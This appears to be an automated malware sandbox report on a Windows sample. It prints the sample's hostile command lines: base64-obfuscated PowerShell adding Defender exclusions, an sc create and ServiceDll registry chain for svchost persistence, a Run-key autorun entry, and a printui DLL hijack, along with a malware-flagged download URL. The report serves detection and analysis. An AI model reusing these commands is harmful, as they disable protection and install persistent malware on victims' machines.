ProcessCommandLine: sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 2128, ProcessName: sc.exe
    Sigma detected: Suspicious Script Execution From Temp Folder
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'", CommandLine: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6100, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'", ProcessId: 5464, ProcessName: powershell.exe
    Sigma detected: CurrentVersion Autorun Keys Modification
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Desktop\curlapp64.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\curlapp64.exe, ProcessId: 4820, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\curlapp64
    Sigma detected: Powershell Defender Exclusion
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 6336, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", ProcessId: 3012, ProcessName: cmd.exe
    Sigma detected: New Service Creation Using Sc.EXE
    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x610437\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x610437.dat" /f && sc start x610437, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3092, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 2128, ProcessName: sc.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;", CommandLine: powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4524, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;", ProcessId: 7112, ProcessName: powershell.exe
    Sigma detected: Windows Processes Suspicious Parent Directory
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k DcomLaunch, CommandLine: C:\Windows\System32\svchost.exe -k DcomLaunch, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k DcomLaunch, ProcessId: 3172, ProcessName: svchost.exe

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: http://unvdwl.com/un2/botprnt.datsInfonAvira URL Cloud: Label: malware
    Source: http://unvdwl.com/un2/botprnt.datsInfoAvira URL Cloud: Label: malware
    Source: http://unvdwl.com/un2/botprnt.datAvira URL Cloud: Label: malware
    Antivirus detection for dropped file
    Source: C:\Users\user\Desktop\prnttemp.dllAvira: detection malicious, Label: HEUR/AGEN.1300651
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeReversingLabs: Detection: 44%
    Source: C:\Users\user\Desktop\prnttemp.dllReversingLabs: Detection: 27%
    Source: C:\Windows \System32\printui.dll (copy)ReversingLabs: Detection: 27%
    Source: C:\Windows\System32\bav64.exeReversingLabs: Detection: 41%
    Source: C:\Windows\System32\console_zero.exeReversingLabs: Detection: 45%
    Source: C:\Windows\System32\svcldr64.datReversingLabs: Detection: 39%
    Source: C:\Windows\System32\x610437.datReversingLabs: Detection: 70%
    Multi AV Scanner detection for submitted file
    Source: dYUteuvmHn.exeReversingLabs: Detection: 65%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
    Machine Learning detection for dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeJoe Sandbox ML: detected
    Source: C:\Windows\System32\bav64.exeJoe Sandbox ML: detected
    Machine Learning detection for sample
    Source: dYUteuvmHn.exeJoe Sandbox ML: detected
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A93604A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,_wcsdup,CertOpenStore,GetLastError,free,free,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,calloc,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,malloc,fclose,free,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,free,5_2_00007FF8A93604A6
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9362CC0 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,5_2_00007FF8A9362CC0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9312B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,5_2_00007FF8A9312B80
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A935FF30 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_00007FF8A935FF30
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A93631F0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,5_2_00007FF8A93631F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A93474E0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,5_2_00007FF8A93474E0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A93316F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_00007FF8A93316F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9347560 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_00007FF8A9347560
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A93475F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_00007FF8A93475F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9331820 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,5_2_00007FF8A9331820
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A93318A0 CryptHashData,5_2_00007FF8A93318A0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A93628A0 CertGetNameStringW,malloc,CertFindExtension,CryptDecodeObjectEx,free,free,CertFreeCertificateContext,5_2_00007FF8A93628A0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A93318B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_00007FF8A93318B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834DAA0 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_new,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_memdup,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,55_2_00007FF8B834DAA0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8342F50 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,55_2_00007FF8B8342F50
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83442D0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,CRYPTO_strdup,OPENSSL_LH_new,OPENSSL_LH_set_thunks,ERR_new,X509_STORE_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,OPENSSL_sk_num,ERR_new,OPENSSL_sk_new_null,ERR_new,OPENSSL_sk_new_null,ERR_new,CRYPTO_new_ex_data,ERR_new,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,55_2_00007FF8B83442D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8341950 CRYPTO_free,CRYPTO_strdup,55_2_00007FF8B8341950
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8397920 ERR_new,ERR_set_debug,CRYPTO_malloc,COMP_expand_block,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B8397920
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83679D0 CRYPTO_malloc,memcpy,BIO_snprintf,BIO_snprintf,CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_new_file,BIO_free_all,CRYPTO_free,BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83679D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A9985 ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,55_2_00007FF8B83A9985
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83719A0 CRYPTO_malloc,55_2_00007FF8B83719A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A999C EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,CRYPTO_malloc,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free,55_2_00007FF8B83A999C
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A99B3 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,55_2_00007FF8B83A99B3
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838DA40 CRYPTO_memcmp,55_2_00007FF8B838DA40
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833DA50 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OSSL_STACK_OF_X509_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,55_2_00007FF8B833DA50
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8371A60 CRYPTO_free,55_2_00007FF8B8371A60
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8343A70 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OSSL_STACK_OF_X509_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B8343A70
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8353A70 CRYPTO_get_ex_data,55_2_00007FF8B8353A70
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8339A20 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,55_2_00007FF8B8339A20
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83ABAA0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,55_2_00007FF8B83ABAA0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A9B4A memset,CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,55_2_00007FF8B83A9B4A
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8357B50 EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,ERR_new,ERR_set_debug,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,55_2_00007FF8B8357B50
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837BB00 CRYPTO_free,55_2_00007FF8B837BB00
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A9B33 EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestVerify,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,55_2_00007FF8B83A9B33
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8331BE0 CRYPTO_zalloc,55_2_00007FF8B8331BE0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8337BEE CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B8337BEE
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B9C40 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B83B9C40
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8333C40 ERR_clear_error,ERR_new,ERR_set_debug,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,SetLastError,BIO_read,BIO_ADDR_new,BIO_ctrl,BIO_ctrl,BIO_ADDR_free,BIO_write,BIO_ctrl,BIO_test_flags,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_ctrl,BIO_ADDR_clear,BIO_write,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_test_flags,BIO_ADDR_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,55_2_00007FF8B8333C40
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8331C50 CRYPTO_zalloc,55_2_00007FF8B8331C50
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8339C50 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,55_2_00007FF8B8339C50
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A1C70 CRYPTO_realloc,55_2_00007FF8B83A1C70
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834BC10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,55_2_00007FF8B834BC10
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8383C30 CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,55_2_00007FF8B8383C30
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A9CC1 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_CTX_copy_ex,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,55_2_00007FF8B83A9CC1
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8359CC0 EVP_MAC_CTX_free,CRYPTO_free,55_2_00007FF8B8359CC0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839FC90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,55_2_00007FF8B839FC90
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A9CAA ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free,55_2_00007FF8B83A9CAA
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B836FCB0 CRYPTO_free,55_2_00007FF8B836FCB0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837BD60 CRYPTO_zalloc,55_2_00007FF8B837BD60
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8353D70 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,55_2_00007FF8B8353D70
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8385D30 CRYPTO_free,55_2_00007FF8B8385D30
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839DDE0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,55_2_00007FF8B839DDE0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A9DA6 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,55_2_00007FF8B83A9DA6
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8337DA0 CRYPTO_free,55_2_00007FF8B8337DA0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83ABDB0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_is_a,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,55_2_00007FF8B83ABDB0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8335DB0 CRYPTO_malloc,55_2_00007FF8B8335DB0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8353E50 CRYPTO_free,CRYPTO_memdup,55_2_00007FF8B8353E50
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8369E60 OPENSSL_LH_free,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,55_2_00007FF8B8369E60
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8371E70 CRYPTO_realloc,55_2_00007FF8B8371E70
